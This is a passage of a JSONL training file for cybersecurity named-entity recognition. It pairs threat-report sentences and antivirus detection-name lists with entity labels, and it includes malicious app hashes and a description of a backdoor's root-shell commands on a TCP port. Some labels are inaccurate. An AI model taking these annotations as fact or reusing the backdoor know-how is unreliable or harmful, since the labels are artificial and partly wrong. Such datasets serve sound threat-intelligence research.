9]], "THREAT_ACTOR: campaign": [[31, 39]]}, "info": {"id": "cyner2_train_004806", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.TonersyASC.Trojan Ransom/W32.Dcryptor.2415104 Ransom.Mambretor.A5 Trojan.Dcryptor.Win32.2 Troj.Ransom.W32.Dcryptor.toNk Trojan/Filecoder.DCryptor.b Win32.Trojan.WisdomEyes.16070401.9500.9975 W32/HDD_Cryptor.A!Eldorado Ransom.HDDCryptor Win.Ransomware.HDDCryptor-2 Win32.Trojan-Ransom.Mamba.A Trojan-Ransom.Win32.Dcryptor.b Trojan.Win32.Filecoder.elaurk Trojan.Win32.Z.Dcryptor.2415104 Tool.PassView.841 Ransom_HDDCRYPTOR.SM Trojan-Ransom.Mamba W32/HDD_Cryptor.A!Eldorado Trojan.Dcryptor.a TR/FileCoder.rrsau Trojan[Ransom]/Win32.Blocker Trojan.Ransom.HDDCrypt.1 Trojan-Ransom.Win32.Dcryptor.b Ransom:Win32/Mambretor.A Trojan/Win32.Dcryptor.C1564580 Hoax.Dcryptor Ransom.HDDCryptor Trj/CI.A Win32/Filecoder.DCryptor.B Win32/Trojan.f14", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004807", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DL.Banload!wDurcHh4EfA Spyware.Keylogger TROJ_BANLOAD.AET Win32.TRCrypt.Fkm PUA.Packed.PECompact-1 Trojan-Downloader.Win32.Banload.blpr Trojan-Spy.Win32.Bancos!IK Trojan.DownLoader3.52680 TROJ_BANLOAD.AET TrojanDownloader.Banload.awii Downloader/Win32.Banload TrojanDownloader.Banload.blmr Spyware.Keylogger!rem Trojan-Spy.Win32.Bancos W32/Banload.BLPR!tr.dldr Downloader.Banload.BKYW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004811", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Pugeju Trojan.Win32.Crypt.raab TrojWare.Win32.Inject.~AT BehavesLike.Win32.PUPXAC.lm Trojan-GameThief.Win32.OnLineGames Trojan/Crypt.acz Trojan/Win32.Invader Trj/CI.A Win32/Obfuscated.NBX Win32/Trojan.be7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004812", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Beaugrit.S16628 Trojan/Spy.Shiz.ncd Win32.Trojan-Spy.Shiz.b 
Backdoor.Trojan HT_SIMDA_GA310E71.UVPM Trojan.Win32.Ibank.vuhyo TrojWare.Win32.Spy.Shiz.ZV Trojan.PWS.Ibank.373 Trojan.Shiz.Win32.571 HT_SIMDA_GA310E71.UVPM BehavesLike.Win32.Backdoor.fh TR/BAS.Dorkbot.20619344 Trojan.Zusy.Elzob.D21CE PWS:Win32/Simda.K Win32/Spy.Shiz.NCD TrojanSpy.Shiz!qC77/NFCWBg Backdoor.Win32.Simda W32/Shiz.NCD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004813", "source": "cyner2_train"}} {"text": "The cause for this uptick appears due to widespread WordPress site compromises.", "spans": {}, "info": {"id": "cyner2_train_004814", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodfd4.Trojan.50bd Spyware.PasswordStealer TROJ_FRS.0NA000J416 TROJ_FRS.0NA000J416 Trojan.Win32.Z.Securityxploded.418304[h] BehavesLike.Win32.PWSZbot.gh W32/Trojan.ZJJQ-6216 Unwanted/Win32.Passview.C1588969 Riskware.Win32.PassDumper Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004815", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Cloda21.Trojan.c461 DLoader.QYW Win32/SillyDl.ACS Trojan.Win32.A.Downloader.146388 Trojan.DownLoader.6702 BehavesLike.Win32.Downloader.cm TrojanDownloader:Win32/Pusrac.A Trojan.Win32.Downloader.AE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004817", "source": "cyner2_train"}} {"text": "Late in the summer of 2016, CrowdStrike Intelligence analysts began investigating a curious Android Package APK named Попр-Д30.apk' which contained a number of Russian language artifacts that were military in nature.", "spans": {"ORGANIZATION: CrowdStrike Intelligence analysts": [[28, 61]], "SYSTEM: Android Package APK": [[92, 111]], "MALWARE: Попр-Д30.apk'": [[118, 131]]}, "info": {"id": "cyner2_train_004818", "source": "cyner2_train"}} {"text": "This malware gives attackers an avenue into internal networks which compromised devices are connected to—a notable risk if the device is used to connect to company networks.", 
"spans": {"MALWARE: malware": [[5, 12]], "THREAT_ACTOR: attackers": [[19, 28]], "SYSTEM: internal networks": [[44, 61]], "SYSTEM: device": [[127, 133]], "SYSTEM: company networks.": [[156, 173]]}, "info": {"id": "cyner2_train_004819", "source": "cyner2_train"}} {"text": "The Trojan may perform a man-in-the-middle MitM attack on the browser installed on the compromised computer.", "spans": {"MALWARE: Trojan": [[4, 10]], "SYSTEM: the browser": [[58, 69]], "SYSTEM: the compromised computer.": [[83, 108]]}, "info": {"id": "cyner2_train_004822", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9670 Backdoor.Felismus Trojan/Win32.Skeeyah.C1905486 Trj/GdSda.A Trojan.Win32.Tomyjery", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004823", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.VBKrypt.208896.AN Trojan.Win32.VBKrypt!O WORM_VOBFUS.SMIA Trojan.Packed.21297 WORM_VOBFUS.SMIA Trojan.Barys.266 Trojan/Win32.VBKrypt.R2844 Worm.Win32.Vobfus", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004824", "source": "cyner2_train"}} {"text": "Beginning in July 2015 and possibly earlier, the attack continued into August and is currently ongoing.", "spans": {}, "info": {"id": "cyner2_train_004825", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Constructor.Macro.Ultras.A Constructor.Win32.Ultras.10!O WM/Uck.kit Constructor.W32.Ultras!c Trojan/Constructor.Ultras.10.a Trojan.Constructor.Macro.Ultras.A Ultras.Kit Win.Tool.Macro-8 Trojan.Constructor.Macro.Ultras.A Constructor.Win32.Ultras.10.a Trojan.Constructor.Macro.Ultras.A Riskware.Win32.Ultras-10.hpwc Trojan.Constructor.Macro.Ultras.A Constructor.Macro.Ultras.A Trojan.Constructor.Macro.Ultras.A VirusConstructor.Ultras.2 Tool.Ultras.Win32.1 WM/Uck.kit W32/Tool.QHJM-3031 Constructor.Macro.Ultras.10 TR/ConKit.UltrasUck Constructor.Win32.Ultras.10.a HackTool/Win32.Constructor.C218755 
Trojan.Constructor.Macro.Ultras.A Constructor.Ultras Win32.Trojan.Ultras.Pegg Constructor.Win32.Ultras Win32/Trojan.5bd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004827", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.Stration.D Win32.Worm.Stration.D Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Worm.Stration.D Email-Worm.Win32.Warezov.k Win32.Worm.Stration.D Win32.Worm.Stration.D Heur.Packed.Unknown Win32.Worm.Stration.D Win32.HLLM.Limar Backdoor.Win32.IRCBot Trojan:Win32/Stration.K Win32.Worm.Stration.D Email-Worm.Win32.Warezov.k", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004828", "source": "cyner2_train"}} {"text": "Recently, we detected Carbanak campaigns attempting to:Target high level executives in financial companies or in financial/decision-making roles in the Middle East, U.S. and Europe ,Spear-phishing emails delivering URLs, macro documents, exploit documents,Use of Spy.Sekur Carbanak malware and commodity remote access Trojans RATs such as jRAT, Netwire, Cybergate and others used in support of operations.", "spans": {"THREAT_ACTOR: Carbanak campaigns": [[22, 40]], "ORGANIZATION: high level executives in financial companies": [[62, 106]], "ORGANIZATION: financial/decision-making roles": [[113, 144]], "MALWARE: Spy.Sekur Carbanak malware": [[263, 289]], "MALWARE: commodity remote access Trojans RATs": [[294, 330]], "MALWARE: jRAT, Netwire, Cybergate": [[339, 363]], "THREAT_ACTOR: support of operations.": [[383, 405]]}, "info": {"id": "cyner2_train_004829", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.QueryexXAAF.Worm Application.Hacktool.AW Worm.Win32.Zombaque!O Worm.Zombaque.A3 WORM_BIZOME.SMD W32.Spybot.Worm Win32/Zombaque.A WORM_BIZOME.SMD Win.Worm.Zombaque-12 Application.Hacktool.AW Worm.Win32.Zombaque.a Application.Hacktool.AW Trojan.Win32.Zombaque.bzuxu Worm.Win32.Zombaque.318464.A Application.Hacktool.AW Application.Hacktool.AW 
Win32.HLLW.RAhack Worm.Zombaque.Win32.2 BehavesLike.Win32.Sality.fc Worm.Win32.Zombaque Worm/Zombaque.l Worm/Win32.Zombaque Worm:Win32/Zombaque.A Application.Hacktool.AW Worm.Win32.Zombaque.a Worm/Win32.Zombaque.R3338 Worm.Zombaque Win32/Zombaque.A Worm.Win32.Zombaque.a Worm.Zombaque!23w9coTlBlo W32/Zombaque.A.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004830", "source": "cyner2_train"}} {"text": "In a quick Google search you can find practically anything you need to know.", "spans": {}, "info": {"id": "cyner2_train_004833", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Wdfload.89 Trojan.Win64.Wdfload Trojan.Wdfload.cqq TR/Wdfload.slana Trojan/Win64.Wdfload Trojan/Win64.Wdfload.C2364123 Trj/CI.A W32/Wdfload.AA!tr Win32/Trojan.bfd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004834", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader Win32.Trojan.WisdomEyes.16070401.9500.9691 Trojan-Downloader.Win32.Injecter.vxy BehavesLike.Win32.PWSZbot.fc W32/Trojan.SBIX-6310 Trojan.Heur.TP.E5F612 Trojan-Downloader.Win32.Injecter.vxy Trj/CI.A Win32/Trojan.03f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004835", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Pandex Heur.Packed.Unknown Trojan.DownLoad.3750 Heuristic.LooksLike.Win32.Morphine.I VirTool:Win32/Obfuscator.EK Voronezh.1600.A Packed.Morphine.C Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004836", "source": "cyner2_train"}} {"text": "The threat actor leveraged the CVE-2017-0199 Microsoft Word Office/WordPad Remote Code Execution Vulnerability with carefully crafted decoy content customized for each target recipient.", "spans": {"THREAT_ACTOR: The threat actor": [[0, 16]], "VULNERABILITY: Microsoft Word Office/WordPad Remote Code Execution Vulnerability": [[45, 110]]}, "info": {"id": "cyner2_train_004837", "source": 
"cyner2_train"}} {"text": "The first stage would be a malicious link within the e-mail or attachment, containing malicious code, in this case Pony.", "spans": {"MALWARE: Pony.": [[115, 120]]}, "info": {"id": "cyner2_train_004838", "source": "cyner2_train"}} {"text": "Mobile app creators are often looking for ways to monetize their software.", "spans": {"ORGANIZATION: Mobile app creators": [[0, 19]], "SYSTEM: software.": [[65, 74]]}, "info": {"id": "cyner2_train_004839", "source": "cyner2_train"}} {"text": "The attackers deliver malware through topically titled spearphises, for example Energy_Data_Meeting_fall_2016.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "cyner2_train_004840", "source": "cyner2_train"}} {"text": "The source code for Linux.Mirai bot was released a few weeks ago.", "spans": {"MALWARE: bot": [[32, 35]]}, "info": {"id": "cyner2_train_004841", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.D27EA8 Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Expiro.hc Trojan.Win32.Scar TrojanDropper:Win32/Binko.A W32/Cbot.NCN!tr.bdr Win32/Trojan.Dropper.007", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004842", "source": "cyner2_train"}} {"text": "The PureCrypter campaign uses the domain of a compromised non-profit organization as a Command and Control C2 to deliver a secondary payload.", "spans": {"THREAT_ACTOR: The PureCrypter campaign": [[0, 24]], "ORGANIZATION: non-profit organization": [[58, 81]], "MALWARE: secondary payload.": [[123, 141]]}, "info": {"id": "cyner2_train_004843", "source": "cyner2_train"}} {"text": "Despite recent progress, the country is subject to ongoing conflict with ethnic rebels and an ongoing civil war.", "spans": {}, "info": {"id": "cyner2_train_004844", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Bancodor.482816 Backdoor/Bancodor.b BKDR_BADCODOR.A W32/Bancodor.C@bd Backdoor.Badcodor Win32/PSWSpider.G 
BKDR_BADCODOR.A Win.Trojan.Bancodor-22 Backdoor.Win32.Bancodor.b Trojan.Win32.Bancodor.fzet Backdoor.Win32.A.Bancodor.455260 Backdoor.Win32.Bancodor.~B Trojan.Bancdo Backdoor.Bancodor.Win32.150 W32/Bancodor.NOXQ-3353 Backdoor/Bancodor.b BDS/Badcodor.B.6 Trojan[Backdoor]/Win32.Bancodor Win32.Hack.Bancodor.b.kcloud Backdoor:Win32/Badcodor.B Backdoor.W32.Bancodor.b!c Backdoor.Win32.Bancodor.b Backdoor/Win32.Bancodor.R145952 Backdoor.Bancodor Win32/Bancodor.B Backdoor.Badcodor.A Backdoor.Win32.Bancodor Bck/Bancodor.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004847", "source": "cyner2_train"}} {"text": "The Trojan drops a PowerPoint presentation that contains details about the 2nd Myanmar Industrial Human Resource Development Symposium.", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_004848", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Rincux.AV Trojan.Rincux.AV Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_DLOAD.KKK Trojan.Rincux.AV Trojan.Rincux.AV BackDoor.Attack.594 TROJ_DLOAD.KKK Backdoor/Ceckno.awl W32/Downloader.L Trojan.Rincux.AV Trojan.Rincux.AV Backdoor.Ceckno!6jtmdMg8Vqs Virus.Win32.Small", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004849", "source": "cyner2_train"}} {"text": "Recently, TrendMicro uncovered a new cyber-espionage attack by a well-funded and organized group targeting companies close to governments and in key industries mostly in Asia.", "spans": {"ORGANIZATION: TrendMicro": [[10, 20]], "THREAT_ACTOR: group": [[91, 96]], "ORGANIZATION: companies": [[107, 116]], "ORGANIZATION: governments": [[126, 137]], "ORGANIZATION: industries": [[149, 159]]}, "info": {"id": "cyner2_train_004850", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/AutoRun.Delf.RF Trojan.Win32.Autoruner2.czfwpa Win32.HLLW.Autoruner2.13746 BehavesLike.Win32.Dropper.dc Trojan.Graftor.D22611 Worm:Win32/Kerm.A Worm/Win32.AutoRun.C332941 
Win32.Worm.Autorun.Wted Worm.Win32.Kerm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004852", "source": "cyner2_train"}} {"text": "The Trojans designed to steal money from bank accounts pose a serious threat to Android users.", "spans": {"MALWARE: Trojans": [[4, 11]], "ORGANIZATION: bank accounts": [[41, 54]], "SYSTEM: Android users.": [[80, 94]]}, "info": {"id": "cyner2_train_004853", "source": "cyner2_train"}} {"text": "Sending the command sh to TCP port 6200 results in a full terminal being dropped : Sending the command cmd followed by a proper terminal command will execute it and print the output ( in the example we use id which displays the identity of the system user running the issued commands ) : Doing the same as above but with command sucmd will run the terminal command as root : Other commands supported by rootdaemon on TCP port 6200 are su ( which in our tests did n't properly work ) , loadsocketpolicy , loadfilepolicy , remount and removeroot .", "spans": {}, "info": {"id": "cyner2_train_004854", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D10C13 Trojan-Downloader.Win32.Sysdrop.am Trojan.Win32.Z.Sysdrop.598528 Troj.Downloader.W32!c Trojan.DownLoader22.41648 Adware.BrowseFox.Win32.397064 W32/Trojan.VFXM-3248 TrojanDownloader.Sysdrop.h BDS/Ananlog.okrph Trojan[Downloader]/Win32.Sysdrop Backdoor:Win32/Ananlog.A Trojan-Downloader.Win32.Sysdrop.am Trj/GdSda.A Win32.Trojan-downloader.Sysdrop.Eok Trojan.DL.Sysdrop! 
Win32/Backdoor.773", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004856", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.LethicKAAB.Trojan Trojan.VB Win32.Trojan.VB.bj Trojan.KillFiles.29071 BehavesLike.Win32.VBObfus.cm Trojan.Win32.VB Trojan.Ursu.DFEE TScope.Trojan.VB Win32/VB.OCY Win32/Worm.VB.X", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004857", "source": "cyner2_train"}} {"text": "This is done by redirecting victim traffic through a malicious proxy server.", "spans": {"SYSTEM: malicious proxy server.": [[53, 76]]}, "info": {"id": "cyner2_train_004859", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.2B84 Worm.Esjey Win32.Trojan.WisdomEyes.16070401.9500.9938 Trojan.Win32.CFI.dcbjxv Trojan.DownLoader12.30909 BehavesLike.Win32.BadFile.wh Worm:Win32/Esjey.A Trojan.Graftor.D299B4 HEUR/Fakon.mwf Virus.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004862", "source": "cyner2_train"}} {"text": "PluginPhantom is a new class of Google Android Trojan: it is the first to use updating and to evade static detection.", "spans": {"MALWARE: PluginPhantom": [[0, 13]], "MALWARE: Google Android Trojan:": [[32, 54]]}, "info": {"id": "cyner2_train_004868", "source": "cyner2_train"}} {"text": "This is a read only mode which can help end users remain protected from malicious document files.", "spans": {}, "info": {"id": "cyner2_train_004871", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Delf.rdv Trojan.Win32.Qhost.afmj Trojan.AVKill.28805 TR/Rogue.kdz.976325 Trojan/Win32.Qhost Trojan.Graftor.D1154C Trojan.Win32.Qhost.afmj TrojanDownloader:Win32/Qhost.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004877", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Turla.a BKDR64_TURLA.YKV Win32.Trojan.WisdomEyes.16070401.9500.9968 Backdoor.Trojan BKDR64_TURLA.YKV 
Win64.Rootkit.Uroburos.A Backdoor.Win64.Turla.e Trojan.Win64.Turla.dflvfq Backdoor.Win64.Turla!c Trojan:W64/Turla.B BackDoor.Turla.20 Trojan.Turla.Win64.3 BDS/Turla.OE Backdoor.Win64.Turla.e Backdoor.Turla Trj/CI.A Win64/Turla.A Win32.Trojan.Url.Xqlp Win32/Trojan.URL.5b6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004879", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Trojan-Ransom.Cryptolocker.AB Trojan.DownLoader25.64138 W32/Trojan.QFWN-8242 TR/Injector.pegqr Trojan.Graftor.D472BE TrojanDownloader:Win32/Zdowbot.B Heur.Malware-Cryptor.Filecoder Trojan.Win32.Zlader W32/Injector.DASN!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004881", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.BypassUAC Win.Tool.Win7Elevate-1 Exploit.Win32.BypassUAC.bfo ApplicUnsaf.Win64.Win7Elevate Exploit.BypassUAC.Win32.550 W64/Trojan.SZNL-6335 Exploit.BypassUAC.ny SPR/Welevate.A Trojan[Exploit]/Win32.BypassUAC HackTool:Win64/Welevate.A Exploit.Win32.BypassUAC.bfo HackTool/Win32.Win7Elevate.R27568 Trj/CI.A Win32.Exploit.Bypassuac.Dyqu Trojan.Win32.Webprefix", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004882", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Randex.B@mm Backdoor.IRCBot W32/Randex.worm.B Win32.Trojan.WisdomEyes.16070401.9500.9811 W32/Randex.B W32.Randex Win32/Lioten.F Win.Worm.Randex-2 Worm.Win32.Randex.b Win32.Randex.B@mm Trojan.Win32.Randex.glyj W32.W.Randex.b!c Win32.Worm.Randex.Ajbc Win32.Randex.B@mm Worm.Win32.Randex.B Win32.Randex.B@mm Win32.HLLW.Randex.45056 Worm.Randex.Win32.3 BehavesLike.Win32.PWSZbot.lc W32/Randex.B Worm/Randex.b Worm/Win32.Randex Win32.Randex.E2C45E Worm.Win32.Randex.18432 Worm.Win32.Randex.b Worm:Win32/Randex.FN Trojan/Win32.HDC.C82152 Win32.Randex.B@mm Backdoor.IRCBot Worm.Randex Win32/Randex.B Worm.Win32.Randex!jlps7ds/blM W32/Randex.B!worm", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004883", "source": "cyner2_train"}} {"text": "The combination of these capabilities makes JSocket a unique and serious threat to the electronic and physical security of victims.", "spans": {"MALWARE: JSocket": [[44, 51]], "MALWARE: threat": [[73, 79]], "ORGANIZATION: electronic": [[87, 97]], "ORGANIZATION: physical security of victims.": [[102, 131]]}, "info": {"id": "cyner2_train_004884", "source": "cyner2_train"}} {"text": "The EternalBlue exploit MS017-010 was initially used by WannaCry ransomware and Adylkuzz cryptocurrency miner.", "spans": {"MALWARE: The EternalBlue exploit": [[0, 23]], "MALWARE: WannaCry ransomware": [[56, 75]], "MALWARE: Adylkuzz cryptocurrency miner.": [[80, 110]]}, "info": {"id": "cyner2_train_004885", "source": "cyner2_train"}} {"text": "SELECTED SAMPLES Package Name SHA-256 Digest com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09 com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131 com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b Exobot ( Marcher ) - Android banking Trojan on the rise February 2017 Introduction The past months many different banking Trojans for the Android platform have received media attention .", "spans": {"MALWARE: Exobot": [[732, 738]], "MALWARE: Marcher": [[741, 748]], "SYSTEM: Android": [[753, 760], [870, 877]]}, "info": {"id": "cyner2_train_004886", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
W32.FilodasD.Trojan Backdoor/W32.Small.19968.AH Backdoor.Win32.Small!O Trojan.Downloader.slowblog Backdoor/Small.klk Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Small-13891 Backdoor.Win32.Small.klk Trojan.Win32.Small.reykq Backdoor.Win32.A.Small.19968 Backdoor.W32.Small.klk!c Trojan.DownLoad2.37573 Backdoor.Small.Win32.7582 BehavesLike.Win32.Downloader.lm Backdoor/Small.hcp W32/Cowsid.A!tr Trojan[Backdoor]/Win32.Small Win32.Hack.Small.kcloud Trojan.Heur.RP.E95DD0 Backdoor.Win32.Small.klk TrojanDownloader:Win32/Coswid.A Downloader/Win32.Small.C65823 Backdoor.Small Win32/TrojanDownloader.Coswid.A Backdoor.Small!nWa7meIxFMI Trojan-Downloader.Win32.Small", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004887", "source": "cyner2_train"}} {"text": "A backdoor also known as: Udsdangerousobject.Multi Win32.Trojan.WisdomEyes.16070401.9500.9998 BackDoor.Bulknet.780 W32/Trojan.JPON-8649 TrojanDropper:Win32/Insup.A Win32.Trojan.Spnr.Afhv Win32/Trojan.9d8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004888", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.DownLoader25.45618 Trojan:Win32/Relnicar.A!dha Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004892", "source": "cyner2_train"}} {"text": "Ahnlab is a popular antivirus software in South Korea.", "spans": {"ORGANIZATION: Ahnlab": [[0, 6]], "SYSTEM: popular antivirus software": [[12, 38]]}, "info": {"id": "cyner2_train_004893", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.Cerber.1 Trojan.Ransom.Cerber.1 Trojan.Dropper Trojan.Ransom.Cerber.1 Ransom_HPCERBER.SMALY5A Win32.Trojan.Kryptik.anp Ransom_HPCERBER.SMALY5A Trojan.Ransom.Cerber.1 Trojan.Ransom.Cerber.1 Trojan.Ransom.Cerber.1 Trojan.Ransom.Cerber.1 Trojan.Ssebot.2 BehavesLike.Win32.Dropper.vc Spammer:Win32/Rowdab.A Trj/GdSda.A W32/Kryptik.EXLK!tr", "spans": {"MALWARE: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004894", "source": "cyner2_train"}} {"text": "The themes of the messages used in the attacks are related to IT Infrastructure such as a log of Server Status Report or a list of Cisco Iron Port Appliance details.", "spans": {"SYSTEM: IT Infrastructure": [[62, 79]]}, "info": {"id": "cyner2_train_004897", "source": "cyner2_train"}} {"text": "Last week on October 7, Raytheon | Websense® Security Labs™ noticed an interesting email campaign distributing what at first appeared to be Dridex botnet 220.", "spans": {"ORGANIZATION: Raytheon": [[24, 32]], "THREAT_ACTOR: email campaign": [[83, 97]], "MALWARE: at": [[116, 118]], "MALWARE: Dridex botnet 220.": [[140, 158]]}, "info": {"id": "cyner2_train_004898", "source": "cyner2_train"}} {"text": "A backdoor also known as: Adware.Toolbar.Win32.2435 Trojan.Win32.Spraxeth.elldrz RemoteAdmin.Dexn.v Worm:Win32/Spraxeth.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004902", "source": "cyner2_train"}} {"text": "A backdoor also known as: HT_PATCHER_FC170076.UVPA Win32.Trojan.WisdomEyes.16070401.9500.9787 Backdoor.Graybird HT_PATCHER_FC170076.UVPA Tool.Patcher.140 BehavesLike.Win32.Dropper.pm not-a-virus:RiskTool.Win32.Patcher HackTool:Win32/Patcher.D HackTool/Win32.Patcher.C862855 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004905", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.W.Otwycal.l4av not-a-virus:NetTool.Win32.TCPScan.a Win-AppCare/Tcpscan.108750 HackTool.Win32.TCPScan.fge", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004908", "source": "cyner2_train"}} {"text": "We have notified Google of the abuse and are working with them to share additional information.", "spans": {"ORGANIZATION: Google": [[17, 23]]}, "info": {"id": "cyner2_train_004909", "source": "cyner2_train"}} {"text": "Here the list of the files potentially dropped during the installation stage : FILE 
NAME STAGE DESCRIPTION d3d9.dll Stage 4 Malware loader used for UAC environments with limited privileges ; also protected by VM obfuscation aepic.dll , sspisrv.dll , userenv.dll Stage 4 Malware loader used in presence of administrative privileges ; executed from ( and injected into ) a fake service ; also protected by VM obfuscation msvcr90.dll Stage 5 Malware payload injected into the explorer.exe or winlogon.exe process ; also protected by VM obfuscation .cab Config Main configuration file ; encrypted setup.cab Unknown Last section of the setup executable ; content still unknown .7z Plugin Malware plugin used to spy the victim network communications wsecedit.rar Stage 6 Main malware executable After writing some of these files , the malware decides which kind of installation to perform based on the current privilege provided by the hosting process ( for example , if a Microsoft Office process was used as exploit vector ) : Installation process under UAC When running under a limited UAC account , the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run .", "spans": {"SYSTEM: Microsoft Office": [[967, 983]]}, "info": {"id": "cyner2_train_004910", "source": "cyner2_train"}} {"text": "In cooperation with Cisco Advanced Services Incident Response, Talos identified several key aspects of the attack.", "spans": {"ORGANIZATION: Cisco Advanced Services Incident Response, Talos": [[20, 68]]}, "info": {"id": "cyner2_train_004911", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.StartPage!O TrojanDownloader.Small.DF3 Trojan/Dropper.StartPage.bdz TROJ_FAVADD.SMI Win32.Trojan.WisdomEyes.16070401.9500.9719 TROJ_FAVADD.SMI Win.Downloader.134775-1 Win32.Trojan.Favadd.A Trojan.Win32.Alien.bnu Trojan.Win32.Zbot.dydfgj Trojan.Win32.Z.Startpage.69632.D Troj.Downloader.W32.VB.lkln TrojWare.Win32.Pasta.SAB Trojan.MulDrop1.43517 Dropper.StartPage.Win32.220 BehavesLike.Win32.VBObfus.km 
